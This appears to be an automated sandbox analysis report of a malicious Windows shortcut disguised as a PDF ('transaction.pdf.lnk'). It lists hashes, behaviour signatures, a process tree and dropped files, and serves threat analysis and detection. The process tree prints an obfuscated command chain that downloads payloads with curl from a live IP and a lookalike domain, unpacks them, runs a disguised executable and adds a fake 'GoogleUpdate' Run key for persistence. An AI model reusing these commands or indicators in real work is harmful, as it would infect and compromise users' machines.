Analysis

  • max time kernel
    143s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/11/2024, 22:06

General

  • Target

    transaction.pdf.lnk

  • Size

    3KB

  • MD5

    0a2f22c7a16adfe8fbfa67b77edc82b4

  • SHA1

    c2556809eee64ec4061a50d4ea2ee41d6781371f

  • SHA256

    d1dcb2be1a582a5bc503bac9b906f54a4fa7fd2d17b0fa5156b936c7f8acc7bb

  • SHA512

    002bb80565514e02834f182f029f5eb0593d22e915aeb6014cf650ef38b93f0a5b8849e7dd766b4099d96025c083b7a0e6790f815e7eec14a5ee2d44ad4dfeac

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\transaction.pdf.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4916
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /v /c "set "JWU1=e"&&set "RnK2=n"&&set "nKM3=c"&&set "fHp4=r"&&set "uwq5=y"&&set "IIX6=p"&&set "Pfo7=t"&&set "Umz8=i"&&set "FwH9=o"&&set "Nix10=n"&&set "unu11=k"&&set "Mbr12=e"&&set "mNc13=y"&@echo off & (for %t in ("@!Mbr12!!nKM3!h!FwH9! !FwH9!ff" "!nKM3!u!fHp4!l -!FwH9! C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g h!Pfo7!!Pfo7!!IIX6!s://d!fHp4!!Umz8!v!Mbr12!.f!Umz8!l!Mbr12!!Umz8!!FwH9!.!nKM3!!Mbr12!!Nix10!!Pfo7!!Mbr12!!fHp4!/bas!Mbr12!1.j!IIX6!g" "C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g" "!nKM3!u!fHp4!l -L -!FwH9! C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6! h!Pfo7!!Pfo7!!IIX6!://170.75.168.151/KBKWGEBK/aaa" "!IIX6!!FwH9!w!Mbr12!!fHp4!sh!Mbr12!ll -C!FwH9!mma!Nix10!d Ex!IIX6!a!Nix10!d-A!fHp4!!nKM3!h!Umz8!v!Mbr12! -Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6!' -D!Mbr12!s!Pfo7!!Umz8!!Nix10!a!Pfo7!!Umz8!!FwH9!!Nix10!Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp' -F!FwH9!!fHp4!!nKM3!!Mbr12!" "s!Pfo7!a!fHp4!!Pfo7! C:\Users\Admin\AppData\Local\Temp\A!IIX6!!IIX6!l!Umz8!!nKM3!a!Pfo7!!Umz8!!FwH9!!Nix10!F!fHp4!am!Mbr12!H!FwH9!s!Pfo7!.!Mbr12!x!Mbr12!") do echo %~t) > "C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7!" && !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7! ba!Pfo7!2.ba!Pfo7! & !Mbr12!!nKM3!h!FwH9! S!Mbr12!!Pfo7! !FwH9!bjSh!Mbr12!ll = C!fHp4!!Mbr12!a!Pfo7!!Mbr12!Obj!Mbr12!!nKM3!!Pfo7!("WS!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7!.Sh!Mbr12!ll") : !FwH9!bjSh!Mbr12!ll.Ru!Nix10! "!nKM3!md.!Mbr12!x!Mbr12! /c C:\Users\Admin\AppData\Local\Temp\ba!Pfo7!2.ba!Pfo7!", 0, False > "C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7!" & !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7! !fHp4!u!Nix10!_ba!Pfo7!.vbs & s!Pfo7!a!fHp4!!Pfo7! "" !nKM3!s!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7! //!Nix10!!FwH9!l!FwH9!g!FwH9! "C:\Users\Admin\AppData\Local\Temp\!fHp4!u!Nix10!_ba!Pfo7!.vbs""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4388
      • C:\Windows\System32\cscript.exe
        cscript //nologo "C:\Users\Admin\AppData\Local\Temp\run_bat.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4616
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\bat2.bat
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3160
          • C:\Windows\System32\curl.exe
            curl -o C:\Users\Admin\AppData\Local\Temp\test.jpg https://drive.fileio.center/base1.jpg
            5⤵
              PID:5096
            • C:\Windows\System32\curl.exe
              curl -L -o C:\Users\Admin\AppData\Local\Temp\base.zip http://170.75.168.151/KBKWGEBK/aaa
              5⤵
                PID:1748
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\base.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp' -Force
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2192
              • C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe
                C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:4088
                • C:\Windows\System32\wscript.exe
                  wscript.exe "C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs" wscript.exe "C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1" KBKWGEBK & wscript.exe "C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs" reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f"
                  6⤵
                  • Checks computer location settings
                  • Suspicious use of WriteProcessMemory
                  PID:2772
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK & wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f
                    7⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4264
                    • C:\Windows\System32\wscript.exe
                      wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK
                      8⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:3248
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK
                        9⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4932
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK
                          10⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:4816
                          • C:\Windows\system32\cscript.exe
                            "C:\Windows\system32\cscript.exe" //nologo "C:\Users\Admin\AppData\Local\Microsoft\hello.js" KBKWGEBK
                            11⤵
                            • Blocklisted process makes network request
                            PID:2376
                    • C:\Windows\System32\wscript.exe
                      wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f
                      8⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:3616
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f
                        9⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2328
                        • C:\Windows\System32\reg.exe
                          reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f
                          10⤵
                          • Adds Run key to start application
                          PID:4500

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

              Filesize

              3KB

              MD5

              fe3aab3ae544a134b68e881b82b70169

              SHA1

              926e9b4e527ae1bd9b3b25726e1f59d5a34d36a6

              SHA256

              bda499e3f69d8fe0227e734bbb935dc5bf0050d37adf03bc41356dfcb5bcca0b

              SHA512

              3fbd3499d98280b6c79c67b0ee183b27692dbc31acf103b4f8ca4dcdf392afff2b3aad500037f4288581ed37e85f45c3bbb5dcde11cddf3ef0609f44b2ecb280

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              c0e79e67a9a209d37c9e3a9dd6437ab0

              SHA1

              ce94d8bb54f007e7536727606f8120688da83cd4

              SHA256

              7f07c943fdbd9ac658066c962b71b3d1f6f8b5d010b1c776c3eea7f3f737e0b0

              SHA512

              0fff8b276c0efb570e0bcc414c376a27efa2edefab1a0afb7e470a73fd4c47b57846454c145105f935d9e12b4fa50d297e54ea29b09010ccb3ed9d7d1148269d

            • C:\Users\Admin\AppData\Local\Microsoft\hello.js

              Filesize

              7KB

              MD5

              d3764fea6416c62582aae6f79759c2be

              SHA1

              ffba6fe6ae16d9f1c191d462463a5aeec79eb5c7

              SHA256

              0528254a5933622320e8a3aafdcf4d6e0c3a5b49bac2ff49a7c8b61ecd51b3b0

              SHA512

              0da696218c879cda5917e3c81e050b62c83c0611d7825df36c3f971e4da63ecdfc66cc76338c00dbeec6de6c675004eaf2e9a7521580f932cbbc2838de2ceeac

            • C:\Users\Admin\AppData\Local\Microsoft\text1

              Filesize

              1KB

              MD5

              2c4ffae6bfebb1ee0035e1400034265d

              SHA1

              1f93c5cb3953f4a5927ab97eb1618f2c08c448a1

              SHA256

              2fb855f25db72aebe25885ddd1c983b8769944ede510cc658c7d1c6bdd5787c3

              SHA512

              860b4c29d06df1f07258f2b9ae7be5c9830d1bd7aa7ab827c823a6bc961739b6c358b8d5f1efe1b0df00eb398192a2f7495e14b19deafb535450ed72d1472aae

            • C:\Users\Admin\AppData\Local\Microsoft\text2

              Filesize

              1KB

              MD5

              fc8b6f161d4f96d3d299400aa78914b7

              SHA1

              dbe374b617e289f945608254583fc405489f68a5

              SHA256

              bc995c4123c50cd55c83bf1d17815740aea9930863f82eb62936cc598769e46f

              SHA512

              00b76152598a52ec391484969828084ead6f56092c26b47d583b10618caffc930e52b9ea48d9c631cd733f85acad32434434b985719f09580f2eb87731198c9c

            • C:\Users\Admin\AppData\Local\Microsoft\text3

              Filesize

              1KB

              MD5

              4c5b654dd985cb1757a4aa84545dc994

              SHA1

              0266eecac74bbb118780201100bcb8ec8aceef3c

              SHA256

              7639b5d13dcb7090099326b883095771a63cfb7ff0315dbd78ba6060e4ff7e99

              SHA512

              93615577bbccfc5d5328b016dfc5437bdbe19b354b245f760ded06b4165819ab8702de3876ae34b2d21376bdeab92ba6b74632c8a27038be06205417c068ecc0

            • C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe

              Filesize

              78KB

              MD5

              db2fefe19f85e618f62686cf453df33c

              SHA1

              9a37897fb3e75074d451c87e5b3dd602545648a6

              SHA256

              67077124e4a881dba9e4c6e65c8bb45d5ab14a429959f935f933f5824596e463

              SHA512

              e4fb7dadd3ee954c0b46a95521a42cc076f77d75e9f3ce0ab68713a096b7a45b145723c27bb7d420c5cd5489d69867dc31175135a7efe397deab7bec43eab9c2

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y2f4cjrn.dvj.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Local\Temp\base.zip

              Filesize

              634KB

              MD5

              367a5951e81795113b8564546a8346c5

              SHA1

              f5dede6905ce2f0ca23a8f29052c6cbfc66da404

              SHA256

              4cf4e56b88e42327d3e0dfc48b99c05058df7f46d03dd08ed3295bb6b932ea77

              SHA512

              061a0d8e9f3f06d036237091f06c92794156ca253004b82b4ecaa89d48052ae120ea9134fd3532911997e4c038ab7a932fc601d75ea86a7309fb0e255e13f488

            • C:\Users\Admin\AppData\Local\Temp\bat2.bat

              Filesize

              448B

              MD5

              aa350b1db128975bd16e8c2c7c4df7f1

              SHA1

              7be6d97138179f8676740a4e0cbb660736183397

              SHA256

              69d90278d0a0a757b0cc5fc04459d508edbd7e4a8eba6ae66a5fe84ca12af017

              SHA512

              65e523b8a29ac68fd9b2e3afe8825b7506335050769cd39dffb1deb11454b67515fa3cd0a96eb54016540dd2e0dbed87dbbfb6f4ed1f283289f04168108571f6

            • C:\Users\Admin\AppData\Local\Temp\dxgi.dll

              Filesize

              2.4MB

              MD5

              83ce934c9273a1daf846ccd0186e1497

              SHA1

              4439cd1642e8af4f4b6f709bd69ea6afabb62d80

              SHA256

              bff92ebb960e6b5de169fe56e6ebd3862f7b0563ab38687c51d0e09d1bffc819

              SHA512

              c2a6e76f8ce3e6d6378a4becf59b441eeec3b0e4d18e20153a61d6757f10d33425801a3b899527e142bc53307cab26d56fcb0a8472485430e5802dbc7faeec0f

            • C:\Users\Admin\AppData\Local\Temp\run_bat.vbs

              Filesize

              129B

              MD5

              88c7a65cabaeae2e10cbc7bd5608b28b

              SHA1

              d6ee96710a99d0f65a867c6082148ae7a4981227

              SHA256

              250bba449b1002c473327e0f2450753fe07f42ad4ffac8a8dc2f367cb416b543

              SHA512

              b78af497df0dc713822859cb72c58415c0974c43bdd2bad4d4ebdcfc307bbf1f4178452bb7816e28b1a5b3b3f5152a0fbafcd6dc4568d99e9e3fc20ff28a3340

            • C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1

              Filesize

              6KB

              MD5

              f230b7afc89267a9766f3406cb5dbddf

              SHA1

              06797eb37d26eb18757db1daff2d381ab25566ab

              SHA256

              aa27582360eb94b77b942235e6fd1ea5d98fa73f447b8bdba818fcf5a40d09a4

              SHA512

              c2cc1ecd7a70d73fd6f6471a7bf6e45dd11b0698d6beaf65922550489f40233de1a5ddd2a572dff2eb17a1b767ac53f105f0e2e6bad26ccc8193973e914a949a

            • C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs

              Filesize

              604B

              MD5

              66837cd467d2e7fb879f7f8a8a7c32c9

              SHA1

              70367364b2a4ccf95dc39edb3df96cb0bddbce5b

              SHA256

              7904f5905e21ddb8ee0bcaa03e009683b0e5995d7b3b64a5d8fac3cea434eaf5

              SHA512

              8ed864277d19143bd9f073f56eff6720d882cdf7022e1ff996f17d4cb256ed59fee13fd0fe6bdce6c0a26bd45a322142d38fc473d3a6456bc9c211f709baf05a

            • memory/2192-20-0x00000260256C0000-0x00000260256CA000-memory.dmp

              Filesize

              40KB

            • memory/2192-19-0x0000026027C10000-0x0000026027C22000-memory.dmp

              Filesize

              72KB

            • memory/2192-9-0x000002600D140000-0x000002600D162000-memory.dmp

              Filesize

              136KB

            • memory/4088-57-0x00007FFCD3B50000-0x00007FFCD3C8D000-memory.dmp

              Filesize

              1.2MB